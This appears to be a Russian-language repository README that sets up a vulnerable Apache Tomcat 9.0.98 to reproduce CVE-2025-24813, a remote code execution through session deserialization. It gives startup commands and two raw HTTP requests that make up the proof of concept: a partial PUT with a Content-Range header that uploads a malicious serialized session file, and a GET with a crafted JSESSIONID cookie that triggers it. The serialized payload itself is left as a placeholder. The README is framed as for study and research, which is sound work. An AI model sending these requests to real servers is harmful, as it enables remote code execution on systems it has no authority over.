
tomcat CVE-2025-24813: среда RCE через десериализацию
Данный репозиторий представляет собой среду для воспроизведения последней RCE-уязвимости CVE-2025-24813 в Tomcat.
Только для обучения и исследований!
В данной среде уже включены указанные выше условия, необходимые для воспроизведения
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
Доступ: http://127.0.0.1:9001/
Сгенерируйте вредоносный сериализованный файл и загрузите его с помощью следующего пакета. Обратите внимание: значение чанка в Range должно совпадать с Length и превышать текущую длину файла.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{反序列化文件内容)}}
Для срабатывания используйте следующий POC:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx